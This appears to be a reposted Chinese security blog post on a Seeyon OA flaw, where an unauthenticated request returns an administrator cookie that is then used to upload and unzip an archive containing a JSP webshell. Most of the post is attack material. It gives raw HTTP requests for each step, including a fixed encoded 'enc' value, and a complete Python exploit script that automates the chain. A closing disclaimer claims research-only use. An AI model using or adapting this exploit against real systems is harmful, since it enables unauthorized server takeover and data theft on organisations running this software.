首先是一个获取管理cookie的漏洞。然后使用管理员权限的cookie上传压缩文件进行解压,才能达到getshell的目的
POST /seeyon/thirdpartyController.do HTTP/1.1Host: x.x.x.xUser-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 133Content-Type: application/x-www-form-urlencodedmethod=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
然后上传压缩包,记得修改cookie,每个管理员cookie只能使用一次。这里说明一下,这个压缩包里,包含的是我们的webshell。
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1Host:x.x.x.xConnection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.25.1Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5Content-Length: 841Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="firstSave"true--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="callMethod"resizeLayout--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="isEncrypt"0--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="takeOver"false--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="type"0--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="file1"; filename="11.png"Content-Type: image/png111--59229605f98b8cf290a7b8908b34616b--
然后解压,然后访问/seeyon/common/designer/pageLayout/a2345678.jsp
POST /seeyon/ajax.do HTTP/1.1Host: x.x.x.xUser-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedCookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913Content-Length: 157method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%222021-04-10%22%2C%225818374431215601542%22%5D
最后说明一下,你上传文件上去后,记得修改你解压路径,比如,D:\Seeyou\A8\base\upload\2021\04\09\文件名,然后再提交解压申请。
直接用web后台传总是显示上传中,也不知道为啥,希望大佬来解决。
下面是python完整POC:
import requestsimport reimport timeproxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}def seeyon_new_rce(targeturl):orgurl = targeturl# 通过请求直接获取管理员权限cookietargeturl = orgurl + 'seeyon/thirdpartyController.do'post={"method":"access","enc":"TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4","clientPath":"127.0.0.1"}response = requests.post(url=targeturl,data=post,proxies=proxy, timeout=60,verify=False)rsp = ""if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():cookies = response.cookiescookies = requests.utils.dict_from_cookiejar(cookies)# 上传压缩文件aaa=cookies['JSESSIONID']print(aaa)targeturl = orgurl + 'seeyon/fileUpload.do?method=processUpload'files = [('file1', ('11.png', open('1.zip', 'r'), 'image/png'))]print()headers = {'Cookie':"JSESSIONID=%s"%aaa}data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0','isEncrypt': "0"}response = requests.post(url=targeturl,files=files,data=data, headers=headers,proxies=proxy,timeout=60,verify=False)if response.text:reg = re.findall('fileurls=fileurls+","+'(.+)'',response.text,re.I)print(reg)if len(reg)==0:exit("匹配失败")fileid=reg[0]targeturl = orgurl + 'seeyon/ajax.do'datestr = time.strftime('%Y-%m-%d')post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + fileid + '%22%5D'#headers = {'Cookie': cookies}headers['Content-Type']="application/x-www-form-urlencoded"response = requests.post(targeturl, data=post,headers=headers,proxies=proxy,timeout=60,verify=False)print(response.text)seeyon_new_rce("url")
这个压缩包得自己生成了。压缩包里面一定得带有layout.xml 这个文件。空文件也行
例如这样的
他们是在一个压缩包里的!,想要压缩包后台回复:致远
原文始发于微信公众号(Qingy之安全):致远oa管理员cookie文件上传getshell漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论